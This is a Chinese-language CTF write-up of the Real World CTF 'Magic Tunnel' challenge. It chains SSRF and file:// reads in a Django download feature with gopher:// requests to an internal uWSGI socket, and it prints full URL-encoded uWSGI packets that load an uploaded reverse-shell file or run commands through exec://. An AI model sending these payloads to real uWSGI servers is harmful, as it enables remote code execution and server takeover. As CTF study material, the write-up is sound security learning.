Real World CTF Magic Tunnel Write Up
摘要:
賽時的時候沒看這個題目,最後時間隊友發現了點,但是苦於本地搭建不好環境以及沒有時間就放棄了。
言歸正傳。
開啟題目我們發現提供了一個Download功能,隨便測試下,例如: http://www.venenof.com/1.gif
同時這裡沒有限制任何字尾,那...
賽時的時候沒看這個題目,最後時間隊友發現了點,但是苦於本地搭建不好環境以及沒有時間就放棄了。
言歸正傳。
開啟題目我們發現提供了一個Download功能,隨便測試下,例如: http://www.venenof.com/1.gif
同時這裡沒有限制任何字尾,那麼這意味著我們可以遠端下載任意檔案。
通過file協議我們可以讀取任意檔案,利用 file:///proc/mounts 可以找到web目錄:
進而我們可以讀取web目錄的相關檔案:
其中 rwctf/settings.py 的內容如下:
""" Django settings for rwctf project. Generated by 'django-admin startproject' using Django 2.1.3. For more information on this file, see https://docs.djangoproject.com/en/2.1/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/2.1/ref/settings/ """ import os import dj_database_url # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = os.environ.get('SECRET_KEY', 'y5fc9nypwm%x1w^plkld4y#jwgrd)$ys6&!cog^!3=xr5m4#&-') # SECURITY WARNING: don't run with debug turned on in production! DEBUG = os.environ.get('DEBUG', '0') in ('True', 'true', '1', 'TRUE') ALLOWED_HOSTS = ['*'] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'xremote', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'rwctf.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.template.context_processors.media', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'rwctf.wsgi.application' # Database # https://docs.djangoproject.com/en/2.1/ref/settings/#databases DATABASES = { 'default': dj_database_url.config(conn_max_age=600, default='sqlite:////tmp/db.sqlite3') } # Password validation # https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/2.1/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript/">JavaScript, Images) # https://docs.djangoproject.com/en/2.1/howto/static-files/ STATIC_URL = '/static/' STATIC_ROOT = os.path.join(BASE_DIR, 'static') MEDIA_URL = '/media/' MEDIA_ROOT = os.path.join(BASE_DIR, 'media') LOG_PATH = os.environ.get('LOG_PATH', os.path.join(BASE_DIR, 'error.log')) LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'standard': { 'format': '[%(asctime)s] - [%(levelname)s] - [%(pathname)s:%(lineno)d]- %(message)s', 'datefmt': '%Y-%m-%d %H:%M:%S' }, }, 'handlers': { 'console': { 'level': 'WARNING', 'class': 'logging.StreamHandler', 'formatter': 'standard', 'filters': ['discard_not_found_error'], } }, 'loggers': { '': { 'handlers': ['console'], 'level': 'WARNING' }, 'django': { 'handlers': ['console'], 'level': 'WARNING' }, }, 'filters': { 'discard_not_found_error': { '()': 'django.utils.log.CallbackFilter', 'callback': lambda record: hasattr(record, 'status_code') and record.status_code != 404, } }, }
讀取 urls.py
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('', include('xremote.urls', namespace='xremote')),
path('admin/', admin.site.urls),
]
最後讀取 xremote.views.py :
import os
import pycurl
import uuid
from django.utils import dateformat, timezone
from django.shortcuts import render
from django.views import generic
from django.db import transaction
from django.urls import reverse_lazy
from django.conf import settings
from django.http import HttpResponseRedirect
from . import forms
from . import models
class ImgsMixin(object):
def get_context_data(self, **kwargs):
kwargs['imgs'] = self.request.session.get('imgs', [])
return super().get_context_data(**kwargs)
class DownloadRemote(ImgsMixin, generic.FormView):
form_class = forms.ImageForm
template_name = 'index.html'
success_url = reverse_lazy('xremote:download')
def download(self, url):
try:
c = pycurl.Curl()
c.setopt(pycurl.URL, url)
c.setopt(pycurl.TIMEOUT, 10)
response = c.perform_rb()
c.close()
except pycurl.error:
response = b''
return response
def generate_path(self):
path = os.path.join(settings.MEDIA_ROOT, dateformat.format(timezone.now(), 'Y/m/d'))
if not os.path.exists(path):
os.makedirs(path, 0o755)
return os.path.join(path, str(uuid.uuid4()))
@transaction.atomic
def form_valid(self, form):
url = form.cleaned_data['url']
response = self.download(url)
path = self.generate_path()
if response:
with open(path, 'wb') as f:
f.write(response)
url = path[len(settings.MEDIA_ROOT)+1:]
models.Image.objects.create(path=url)
if 'imgs' not in self.request.session:
self.request.session['imgs'] = []
self.request.session['imgs'].append(url)
self.request.session.modified = True
return HttpResponseRedirect(self.get_success_url())
在這裡,我們發現在 settings.py 中,引用了 uwsgi ,同時通過 server.sh 得到 uwsgi 的部署方式:
#!/bin/sh
BASE_DIR=$(pwd)
./manage.py collectstatic --no-input
./manage.py migrate --no-input
exec uwsgi --socket 0.0.0.0:8000 --module rwctf.wsgi --chdir ${BASE_DIR} --uid nobody --gid nogroup --cheaper-algo spare --cheaper 2 --cheaper-initial 4 --workers 10 --cheaper-step 1
在 uwsgi 中,存在 UWSGI_FILE 這種魔術變數會將指定的檔案作為一個新的動態應用載入,那麼如果這個檔案使我們可以控制的,那麼就會造成RCE漏洞。
回到開頭,我們已經知道網站可以任意download檔案,那麼我們在本地測試下,搭建 參考文章 ,而魔術方法可以自動載入執行檔案,於是成功執行如下:
本地抓一下包:
tcpdump -i lo -port 8001 -w dump.pcap 或者直接nc也可以。
前面我們知道有一個download功能,實際上也是一個ssrf漏洞,於是我們可以利用gopher去內網請求 uwsgi ,進而動態執行我們自己的指令碼,本地測試如下:
於是我們回到題目裡,先遠端下載一個反彈shell的pythonshell,然後得到檔名,例如 /usr/src/rwctf/media/2018/12/03/0c0eb4ee-115e-48b5-8fda-c18d81d1ceef ,然後將gopher的資料改為:
gopher://127.0.0.1:8000/_%00u%01%00%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0B%00REQUEST_URI%01%00%2F%09%00PATH_INFO%01%00%2F%0D%00DOCUMENT_ROOT%15%00%2Fusr%2Fshare%2Fnginx%2Fhtml%0F%00SERVER_PROTOCOL%08%00HTTP%2F1.1%0C%00UWSGI_SCHEME%04%00http%0B%00REMOTE_ADDR%09%00127.0.0.1%0B%00REMOTE_PORT%05%0035776%0B%00SERVER_PORT%04%008000%0B%00SERVER_NAME%0B%00example.com%0A%00UWSGI_FILE%09%00%2Fusr%2Fsrc%2Frwctf%2Fmedia%2F2018%2F12%2F03%2F0c0eb4ee-115e-48b5-8fda-c18d81d1ceef%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl%2F7.55.1%0B%00HTTP_ACCEPT%03%00%2A%2F%2A
但是我們要注意
from django import forms from . import models class ImageForm(forms.Form): url = forms.CharField(max_length=512,widget=forms.URLInput())
長度只有512位元組,上面的肯定超了,意味著我們要自己更改,在反覆嘗試後,我發現,其第二位字元的ASCII值實際上就是整個資料包的長度,於是本地修改payload如下:
<?php
echo urlencode(chr(strlen(urldecode('%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0B%00UWSGI_FILED%00/usr/src/rwctf/media/2018/12/03/0c0eb4ee-115e-48b5-8fda-c18d81d1ceef%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl/7.55.1%0B%00HTTP_ACCEPT%03%00%2A/%2A'))));
?>
gopher://127.0.0.1:8000/_%00%E4%00%00%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0A%00UWSGI_FILED%00/usr/src/rwctf/media/2018/12/03/0c0eb4ee-115e-48b5-8fda-c18d81d1ceef%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl/7.55.1%0B%00HTTP_ACCEPT%03%00%2A/%2A
但是在本地是可以得到執行的,反而題目卻不可以,猜測可能是題目環境配置的問題,通過翻閱文件,我發現 UWSGI_APPID 這個魔術方法,其作用是繞過 SCRIPT_NAME 和 VirtualHosting ,從而讓使用者在沒有限制的情況下選擇掛載點。如果在應用的內部列表中找不到它,那麼要載入它。於是可以像下面這樣修改:
server {
server_name server001;
location / {
include uwsgi_params;
uwsgi_param UWSGI_APPID myfunnyapp;
uwsgi_param UWSGI_FILE /var/www/app1.py
}
}
本地抓包如下:
%00%C6%01%00%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0B%00REQUEST_URI%01%00%2F%09%00PATH_INFO%01%00%2F%0D%00DOCUMENT_ROOT%15%00%2Fusr%2Fshare%2Fnginx%2Fhtml%0F%00SERVER_PROTOCOL%08%00HTTP%2F1.1%0C%00UWSGI_SCHEME%04%00http%0B%00REMOTE_ADDR%09%00127.0.0.1%0B%00REMOTE_PORT%05%0036452%0B%00SERVER_PORT%04%008000%0B%00SERVER_NAME%0B%00example.com%0B%00UWSGI_APPID%07%00testxdd%0A%00UWSGI_FILED%00%2Fusr%2Fsrc%2Frwctf%2Fmedia%2F2018%2F12%2F03%2F0c0eb4ee-115e-48b5-8fda-c18d81d1ceef%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl%2F7.55.1%0B%00HTTP_ACCEPT%03%00%2A%2F%2A
修改payload如下:
gopher://127.0.0.1:8000/_%00%FA%00%00%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0B%00UWSGI_APPID%07%00testxdd%0A%00UWSGI_FILED%00/usr/src/rwctf/media/2018/12/04/7683a121-2d76-4a03-b35c-532bbe7f1483%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl/7.55.1%0B%00HTTP_ACCEPT%03%00%2A/%2A
然後反彈shell即可:-D
賽後發現其實早在一月份就有人有了 利用方式 ,而因為uWSGI程式中預設的schemes有 exec ,所以其實可以直接RCE,而同時作者也給了指令碼,甚至於不用本地搭建環境可以直接抓取原始資料包,例如:
%00%DF%00%00%0E%00REQUEST_METHOD%03%00GET%09%00HTTP_HOST%09%00127.0.0.1%09%00PATH_INFO%08%00%2Ftestapp%0B%00SERVER_NAME%09%00127.0.0.1%0F%00SERVER_PROTOCOL%08%00HTTP%2F1.1%0C%00QUERY_STRING%00%00%0B%00SCRIPT_NAME%08%00%2Ftestapp%0A%00UWSGI_FILE%20%00exec%3A%2F%2Ftouch%20%2Ftmp%2Fccc%3B%20echo%20test%0B%00REQUEST_URI%08%00%2Ftestapp
感謝ph師傅給的docker,復現過程遇到了好幾個問題,確實很real world